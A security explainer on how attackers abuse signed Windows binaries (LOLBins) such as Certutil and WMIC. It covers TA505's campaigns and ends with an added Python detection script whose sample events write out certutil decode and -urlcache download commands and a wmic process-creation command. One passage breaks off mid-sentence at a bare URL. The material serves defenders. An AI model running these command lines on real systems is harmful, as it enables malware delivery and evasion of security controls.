Security 101: What are LOLBins and How Can They be Used Maliciously?
by Nikhil Mohanlal, Eleanor Barlow • Aug 2021
There are many abbreviations commonly used in the tech and cyber industry. Some are more familiar than others, and while a few people may first associate the
idea of LOLBins with laughing trash bags, those in security and IT need to understand their importance and how they can be used, both for harmless and
malicious activities.
Initially, LOLBins were used mostly on a post-exploitation basis, to gain persistence or escalate privileges. Today, however, the local system binaries and
preinstalled tools on a machine are also being used to bypass detection and to aid malware delivery, which means that malicious actors can use these LOLBins
to achieve their goals without relying on their own specific code or files.
LOLBins are often Microsoft-signed binaries, such as Certutil and the Windows Management Instrumentation Command-line (WMIC). They can be used for a range
of attacks, from executing code, to performing file operations (downloading, uploading, copying, etc.), to stealing passwords.
TA505
The cybercrime group known as TA505, for instance, has used LOLBins in the past to bypass Windows detection and deliver its ServHelper malware
via a spear-phishing campaign targeting Brazilian entities.
‘By using distributing systems, such as Necurs botnet, the group have been widely recognised since 2014 for their malleable, adjustable, and extensive
ransomware, malware, trojans and spam operations. The real issue is that TA505 uses localised HTML files in different languages. This means that targets are
made worldwide, in any region, within any vertical. The direct effect TA505 has had on promoting entities, including GlobeImposter and other malware options
such as the Trojan FlawedAmmyy, has been significant. The group went quiet for a period, but now TA505 is back to circulating Remote Access Trojans
(RATs), malware downloaders and ransomwares, onto their victim’s technology. After opening a false attachment, the HTML downloads a malicious Excel file
that drops the payload into the victim’s machine. Upon execution, the malware dumps the GraceWire Trojan into the infected device. Attackers also use an IP
https://www.securityhq.com/blog/security-101-lolbins-malware-exploitation/
This technique bypasses the system's security controls by base64-encoding the content of the file, so that it does not look like an executable in transit.
Certutil, a signed Windows binary that is already present on the machine, is then used to decode the malicious file locally.
BOOM. Hacked. Now you have a malicious file on your system sat undetected. Cool, right?
Mitigation tactics based on MITRE ATT&CK recommendations are to employ AppLocker or to manage permissions so that non-privileged users cannot run
these commands. This involves pinning down which binaries and services are and aren’t necessary to the specific operation, be it anything from HR to IT.
However, there is a fine balance to be struck with whitelisting: you don’t want to disrupt day-to-day operations, but you don’t want to keep everything free
flowing either!
The first step would be to ensure that your cyber workforce is well equipped with the knowledge and understanding of this behaviour and its impact. Second,
employ a tool that can detect malicious behaviour, such as an EDR solution installed across the network. This aids in detecting and analysing potentially
malicious code being executed on systems regardless of whether the binary running it is trusted or not.
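As an added example (not from the SecurityHQ article or its authors), the following Python scores process-creation events for the Certutil and WMIC abuse patterns discussed above: the kind of rule an EDR or SIEM applies regardless of whether the binary is Microsoft-signed. The event records are constructed for the example, not real telemetry, and the rule thresholds, the Office-parent and user-writable-path boosters, and the ATT&CK technique ids in the comments are my own mapping rather than anything stated on the page.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed process-creation events in the style of Sysmon Event ID 1 / Windows 4688
# fields. Invented for this example; they are not telemetry from the article.
SAMPLE_EVENTS = [
    {  # base64 blob dropped by a document, decoded with the signed certutil binary
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil.exe -decode C:\Users\Public\invoice.txt C:\Users\Public\invoice.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
    },
    {  # certutil used as a downloader
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil -urlcache -split -f http://files.example/update.txt update.txt",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {  # legitimate certificate work: should not alert
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil -verify C:\certs\server.cer",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {  # WMIC used to spawn a process
        "Image": r"C:\Windows\System32\wbem\WMIC.exe",
        "CommandLine": r'wmic process call create "cmd.exe /c notepad.exe"',
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {  # routine inventory query: should not alert
        "Image": r"C:\Windows\System32\wbem\WMIC.exe",
        "CommandLine": r"wmic os get caption",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
]

# (binary, command-line pattern, ATT&CK technique, base score). The technique ids are
# my mapping, not the article's: T1140 decode/deobfuscate, T1105 ingress tool transfer,
# T1047 Windows Management Instrumentation.
RULES = [
    ("certutil.exe", re.compile(r"(^|\s)-(decode|decodehex|encode)\b", re.I), "T1140", 60),
    ("certutil.exe", re.compile(r"(^|\s)-urlcache\b", re.I), "T1105", 60),
    ("wmic.exe", re.compile(r"\bprocess\s+call\s+create\b", re.I), "T1047", 50),
]

# Context that raises the score: an Office parent (phishing lure) and user-writable paths.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
USER_WRITABLE_HINTS = ("\\users\\public", "\\appdata\\", "\\temp\\", "\\downloads\\")
ALERT_THRESHOLD = 50  # assumed value; tune against your own baseline of admin activity


@dataclass
class Finding:
    command_line: str
    technique: str
    score: int
    reasons: list


def basename(path: str) -> str:
    """Last path component, lower-cased, for case-insensitive image matching."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding when the event matches a LOLBin rule, else None."""
    image = basename(event["Image"])
    cmd = event["CommandLine"]
    for binary, pattern, technique, score in RULES:
        if image != binary or not pattern.search(cmd):
            continue
        reasons = [f"{binary} run with {pattern.pattern!r}"]
        parent = basename(event.get("ParentImage", ""))
        if parent in OFFICE_PARENTS:
            score += 30
            reasons.append(f"spawned by Office process {parent}")
        if any(hint in cmd.lower() for hint in USER_WRITABLE_HINTS):
            score += 10
            reasons.append("operates on a user-writable directory")
        return Finding(cmd, technique, score, reasons)
    return None


def scan(events) -> list:
    """Findings at or above ALERT_THRESHOLD, highest score first."""
    findings = [f for f in (evaluate(e) for e in events) if f and f.score >= ALERT_THRESHOLD]
    return sorted(findings, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.technique}] score={f.score} {f.command_line}")
        for r in f.reasons:
            print("   -", r)
```

The point of scoring rather than plain matching is the whitelisting balance the article describes: `certutil -verify` and `wmic os get caption` are everyday administration and produce no finding, while the same signed binaries run with decode or download switches, from an Office parent, against a user-writable path, climb well past the threshold.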